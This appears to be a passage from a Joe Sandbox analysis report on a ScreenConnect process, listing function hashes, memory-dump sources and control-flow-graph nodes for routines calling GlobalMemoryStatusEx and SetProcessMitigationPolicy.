                                                                                                                                                                                                                                                        Function 00007FF84916789A Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3b25e10c9563f2a0239bf14f99ee6085bca5ba6abea607ae69eaabb852da5c00
                                                                                                                                                                                                                                                        • Instruction ID: 6a5221230e8c42da08e4969030abadf9f8268df287efc06ed5319d93322aa3c3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b25e10c9563f2a0239bf14f99ee6085bca5ba6abea607ae69eaabb852da5c00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C01D142F0C9CA5FF1B6B62C68452B85BC2EBD95B0B4C01FAD409C719FED186C468381
                                                                                                                                                                                                                                                        Function 00007FF849163639 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 16325f700e4f62c653fb7164803d04a791ab7611f421ec18a4a7979c7b9604d3
                                                                                                                                                                                                                                                        • Instruction ID: ba673a4a2aaa9951e35cb6523594af111fa56d06f37253adaa4d9e9fc009592b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16325f700e4f62c653fb7164803d04a791ab7611f421ec18a4a7979c7b9604d3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72F0303580D6DC9FCB46EB64D4958D57FB0EE16320B0941CBE049CB053D6259A59CB82
                                                                                                                                                                                                                                                        Function 00007FF849164BC0 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d0775c113993ef4ef61b9663d9abcdcf0f08a2373ccfa5a77a613569a1d30cee
                                                                                                                                                                                                                                                        • Instruction ID: f2cabe1722b26ea817a41b97f56ba526dfe73ff2d7c378d38cbbc6dd42fbcbbb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0775c113993ef4ef61b9663d9abcdcf0f08a2373ccfa5a77a613569a1d30cee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60E0DF35C4C98D8FDBA5AE64A8142A477A0FF88308F04055AD41CC31C2D7395950CB02
                                                                                                                                                                                                                                                        Function 00007FF849160DE0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 02ca5774e690f38736d505031b874fe42a9795c17bb598ca65e9ddbdc4c25497
                                                                                                                                                                                                                                                        • Instruction ID: e7431faf77b6b40f97a4dd1d34564de8c8c0ba313caee75250465e66be47df3e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02ca5774e690f38736d505031b874fe42a9795c17bb598ca65e9ddbdc4c25497
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5E04F3184990CAFCB15FF68E451CEA7B64EF15318B044197E00DC7052DB22A955CFC5
                                                                                                                                                                                                                                                        Function 00007FF849164050 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ccb9c06818c1e2a02090d2e97e1c0b62934483eddabd7b31f95dbf04e86a05bf
                                                                                                                                                                                                                                                        • Instruction ID: e5b4fe7e7f372f1aeb518126f09aaf77996dfae078d45484770e5e6142a90026
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccb9c06818c1e2a02090d2e97e1c0b62934483eddabd7b31f95dbf04e86a05bf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EE0C225D4D6630BFB7C75B574513F560C09F45390F0A417AD40DC10C9DE6C9CC18996
                                                                                                                                                                                                                                                        Function 00007FF849166FA4 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2b518b6259e750aacc88fdaa709cbc7f3c617ed6063c88bfd079585bda3e3da7
                                                                                                                                                                                                                                                        • Instruction ID: f8d03c89a20a631840a5904dd587f8900a98963600c5ffba5b90a5817cd0a97a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b518b6259e750aacc88fdaa709cbc7f3c617ed6063c88bfd079585bda3e3da7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FE0C22150F6C44FEB16AA3888A88903F90DE2312130901FED08ACB0B3E81D8C49C701
                                                                                                                                                                                                                                                        Function 00007FF849165228 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f9a52cedf47bde59459c8c5f05b875da8450de9fc1b0292ebd319e38ebcd8fdd
                                                                                                                                                                                                                                                        • Instruction ID: 4653dba65311833fdddda917c40c989479841cde431787d516be31f9f45d930f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9a52cedf47bde59459c8c5f05b875da8450de9fc1b0292ebd319e38ebcd8fdd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3D05E24958C0A0BEA197A29886886172D1FB68241BC840A4D80DC21A4EE5EDCC8CA81
                                                                                                                                                                                                                                                        Function 00007FF849162376 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a275ee4537c297f35dc6d6a5e086ca330a386b810931d2333204c1992a6a2c0c
                                                                                                                                                                                                                                                        • Instruction ID: 4230aa7d45c5f6159d32b05f16a33bed1526b432dc6708cc7b4aaa5e640f78bd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a275ee4537c297f35dc6d6a5e086ca330a386b810931d2333204c1992a6a2c0c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FC09250E0C98A9FF2A5FF7684456BE62927F88284F908434E41E82186CE3CB9025649
                                                                                                                                                                                                                                                        Function 00007FF8491620B8 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3304371359.00007FF849160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849160000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff849160000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d1f2bd4577753e2d0310707050a3319f66337a8913b4f725b75e5b1f5291dcb6
                                                                                                                                                                                                                                                        • Instruction ID: e5aefabee2fb747bf8ca78dfb5e4abe799fa9468ca77032efa02c36d906cc35b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1f2bd4577753e2d0310707050a3319f66337a8913b4f725b75e5b1f5291dcb6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4A00241E0D9568EE0F2BA67400567D41511F446C4F204135D41E81196CE7C7D42159A

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:11.3%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:10
                                                                                                                                                                                                                                                        Total number of Limit Nodes:2
                                                                                                                                                                                                                                                        execution_graph 14785 7ff849188cb4 14786 7ff849188cbd 14785->14786 14787 7ff849188e59 GlobalMemoryStatusEx 14786->14787 14788 7ff849188db2 14786->14788 14789 7ff849188e85 14787->14789 14790 7ff848e78014 14791 7ff848e7801d 14790->14791 14792 7ff848e78082 14791->14792 14793 7ff848e780f6 SetProcessMitigationPolicy 14791->14793 14794 7ff848e78152 14793->14794

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF849188CB4 Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 334 7ff849188cb4-7ff849188cbb 335 7ff849188cc6-7ff849188d2a 334->335 336 7ff849188cbd-7ff849188cc5 334->336 340 7ff849188d74-7ff849188d87 335->340 341 7ff849188d2c-7ff849188d55 335->341 336->335 346 7ff849188df8-7ff849188e0c 340->346 347 7ff849188d89-7ff849188d8d 340->347 343 7ff849188d57-7ff849188d5a 341->343 344 7ff849188dae 341->344 348 7ff849188ddb-7ff849188ddf 343->348 349 7ff849188d5c-7ff849188d5e 343->349 345 7ff849188daf 344->345 350 7ff849188db0 345->350 351 7ff849188e2b-7ff849188e2d 345->351 361 7ff849188e0d 346->361 353 7ff849188e0e-7ff849188e0f 347->353 354 7ff849188d8f-7ff849188d91 347->354 367 7ff849188de0 348->367 355 7ff849188d60 349->355 356 7ff849188dda 349->356 359 7ff849188e31-7ff849188e57 350->359 360 7ff849188db1 350->360 363 7ff849188e10-7ff849188e11 353->363 364 7ff849188e59-7ff849188e83 GlobalMemoryStatusEx 353->364 354->361 362 7ff849188d93-7ff849188d97 354->362 357 7ff849188d62-7ff849188d64 355->357 358 7ff849188da3 355->358 356->348 357->367 368 7ff849188d66 357->368 375 7ff849188da5 358->375 376 7ff849188e1f-7ff849188e23 358->376 359->364 371 7ff849188db2-7ff849188dd9 360->371 372 7ff849188df3-7ff849188df7 360->372 361->353 373 7ff849188e13-7ff849188e18 362->373 374 7ff849188d99 362->374 363->373 369 7ff849188e85 364->369 370 7ff849188e8b-7ff849188eb2 364->370 377 7ff849188d68-7ff849188d6a 368->377 378 7ff849188da9 368->378 369->370 371->356 372->346 380 7ff849188e19-7ff849188e1e 373->380 374->348 379 7ff849188d9b-7ff849188d9d 374->379 382 7ff849188da6-7ff849188da7 375->382 383 7ff849188de7-7ff849188de9 375->383 381 7ff849188e25-7ff849188e2a 376->381 387 7ff849188de6 377->387 388 7ff849188d6c 377->388 378->381 384 7ff849188dab-7ff849188dad 378->384 379->380 390 7ff849188d9f-7ff849188da1 379->390 380->376 381->351 382->378 385 7ff849188deb-7ff849188dee 383->385 386 7ff849188def 383->386 384->344 385->386 391 7ff849188df1 386->391 392 7ff849188df2 386->392 387->383 388->345 393 7ff849188d6e-7ff849188d73 388->393 390->358 391->392 392->372 393->340
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.2480598438.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1890195054-0
                                                                                                                                                                                                                                                        • Opcode ID: 201b6ce45451f9d9edc0ae01556ce2b98545c6bff6da104e8651c72b9731ccbe
                                                                                                                                                                                                                                                        • Instruction ID: 9bf37ac3ca341140ea0d938d8948d518444822930a0a084c72e883f830e5ae91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 201b6ce45451f9d9edc0ae01556ce2b98545c6bff6da104e8651c72b9731ccbe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD81273180D6C94FE775EB6898156E87FE0EF623A0F0542FAD06CC7593DA6C680ADB41
                                                                                                                                                                                                                                                        Function 00007FF848E78014 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.2478051094.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff848e70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                        • Opcode ID: b00b9143905d127213113679447a6af93bd6e312cb0d90ca136d4b0f98511dfc
                                                                                                                                                                                                                                                        • Instruction ID: 0a393edf38f033a971e66ca36df35bec77e6db35dc9e3772fa1e5d1df68ec733
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b00b9143905d127213113679447a6af93bd6e312cb0d90ca136d4b0f98511dfc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4512731C0CB584FEB19AFA8984A5E97BE0EF66751F04017FE049C3292DF78A846C795